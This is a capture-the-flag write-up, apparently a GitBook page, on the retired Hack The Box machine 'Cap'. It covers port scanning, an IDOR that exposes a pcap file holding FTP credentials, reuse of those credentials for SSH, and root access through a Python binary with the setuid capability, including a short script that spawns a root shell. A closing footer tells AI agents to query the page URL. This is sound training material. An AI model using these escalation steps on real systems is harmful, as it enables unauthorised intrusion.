# Cap (HTB)

## Intro.

Hello everyone. Today i want to go thought one retired machine on Hack the box Cap , let's get right into it.

***

## Enumeration.

### Port scanning.

```
21/tcp open  ftp     syn-ack ttl 63 vsftpd 3.0.3
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC2vrva1a+HtV5SnbxxtZSs+D8/EXPL2wiqOUG2ngq9zaPlF6cuLX3P2QYvGfh5bcAIVjIqNUmmc1eSHVxtbmNEQjyJdjZOP4i2IfX/RZUA18dWTfEWlNaoVDGBsc8zunvFk3nkyaynnXmlH7n3BLb1nRNyxtouW+q7VzhA6YK3ziOD6tXT7MMnDU7CfG1PfMqdU297OVP35BODg1gZawthjxMi5i5R1g3nyODudFoWaHu9GZ3D/dSQbMAxsly98L1Wr6YJ6M6xfqDurgOAl9i6TZ4zx93c/h1MO+mKH7EobPR/ZWrFGLeVFZbB6jYEflCty8W8Dwr7HOdF1gULr+Mj+BcykLlzPoEhD7YqjRBm8SHdicPP1huq+/3tN7Q/IOf68NNJDdeq6QuGKh1CKqloT/+QZzZcJRubxULUg8YLGsYUHd1umySv4cHHEXRl7vcZJst78eBqnYUtN3MweQr4ga1kQP4YZK5qUQCTPPmrKMa9NPh1sjHSdS8IwiH12V0=
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDqG/RCH23t5Pr9sw6dCqvySMHEjxwCfMzBDypoNIMIa8iKYAe84s/X7vDbA9T/vtGDYzS+fw8I5MAGpX8deeKI=
|   256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPbLTiQl+6W0EOi8vS+sByUiZdBsuz0v/7zITtSuaTFH
80/tcp open  http    syn-ack ttl 63 gunicorn
|_http-server-header: gunicorn
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET
|_http-title: Security Dashboard
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Sun, 01 Dec 2024 00:59:24 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Sun, 01 Dec 2024 00:59:19 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386
|     <!DOCTYPE html>
|     <html class="no-js" lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Security Dashboard</title>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
|     <link rel="stylesheet" href="/static/css/bootstrap.min.css">
|     <link rel="stylesheet" href="/static/css/font-awesome.min.css">
|     <link rel="stylesheet" href="/static/css/themify-icons.css">
|     <link rel="stylesheet" href="/static/css/metisMenu.css">
|     <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
|     <link rel="stylesheet" href="/static/css/slicknav.min.css">
|     <!-- amchar
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Sun, 01 Dec 2024 00:59:19 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Allow: OPTIONS, HEAD, GET
|     Content-Length: 0
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 196
|     <html>
|     <head>
|     <title>Bad Request</title>
|     </head>
|     <body>
|     <h1><p>Bad Request</p></h1>
|     Invalid HTTP Version &#x27;Invalid HTTP Version: &#x27;RTSP/1.0&#x27;&#x27;
|     </body>
|_    </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
```

* HTTP
* FTP
* SSH

### So let's start with FTP,

I tried to login as anonymous but it did not work.

<figure><img src="/files/vlDu2wnGYqLMKTjqQ8oM" alt=""><figcaption></figcaption></figure>

So i belive there is nothing here.

### Enumerater HTTP.

Let's move to the web application.

<figure><img src="/files/RrvkKADGmYDx7RCOlMjf" alt=""><figcaption></figcaption></figure>

We have some links under the user but none of them work, on the left we have IP config , and Network status which show use the *ipconfig, netstat* commands respectively. On the first glance i though maybe some soft of command injection but no Luck.

But we still have the **Security .** when i open that it take some time when it open there was nothing.

<figure><img src="/files/ZRp7YG9kEnQFvg7mWbPN" alt=""><figcaption></figcaption></figure>

I test to change the number in the URL, i switch it to **zero** and i found this.

<figure><img src="/files/ufC3oVu4m5aKbeD3LPFu" alt=""><figcaption></figcaption></figure>

Pressing on the download button will download a **pcap** file.&#x20;

We open the file with wireshark and there we can find the ftp creds.

<figure><img src="/files/QbnQNe3FhJot8VpkR89F" alt=""><figcaption></figcaption></figure>

### Let's head back to FTP.

<figure><img src="/files/2xbm0Z7HCAMeLCVi2ICM" alt=""><figcaption></figcaption></figure>

After we get these files we can find our flag.&#x20;

{% hint style="info" %}
To download a files from FTP to our machine use the **get** command

**get \<file name>**
{% endhint %}

## Shell as nathan.

The creds we have in fact allow us to login via ssh.

<figure><img src="/files/Q7dKcUShbgnhHdfLFv5q" alt=""><figcaption></figcaption></figure>

## Getting Shell as Root.

So once i was in the machine i tried several ways such.

* suid
* path&#x20;
* crons
* sudo allowed

None of them works then i  looked at the machine name CAP. What can it be?\
you are correct ***Capabilities*** . So i checked them using the following command.

{% tabs %}
{% tab title="bash" %}

```bash
getcap -r / 2>/dev/null
```

{% endtab %}
{% endtabs %}

<figure><img src="/files/UiP6HpunS1BGbMxHuBKH" alt=""><figcaption></figcaption></figure>

once i saw python i know what i need to do. We can see that the python cap, allows to set the uid

{% hint style="info" %}
Cap files or executable allow you to allocate some level of privileges to the application without giving it full root access or suid.
{% endhint %}

So now we need to use python to change out uid and get a shell.

{% tabs %}
{% tab title="Python" %}

```python
import os
# out new uid which is the root uid.
new_uid = 0
# setting the uid
os.setuid(new_uid)
#executing bash as the root user since we change out uid to the root.
os.system("/bin/bash -i")
```

{% endtab %}
{% endtabs %}

{% hint style="info" %}
Running the command using python3 \<file name>
{% endhint %}

once we run this code we will get root shell.

<figure><img src="/files/GTcTBiFhByugIU33HTDC" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/5EwbT7lfVo5UapMQD2vm" alt=""><figcaption></figcaption></figure>

## Conclusion.

in the end this machine was a piece of cake and i enjoy that piece for sure, a good machine teach you some level of working with wireshark and how to exploit misconfigure Caps.&#x20;


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pythonic01.gitbook.io/pythonic01/hack-the-box/cap-htb.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.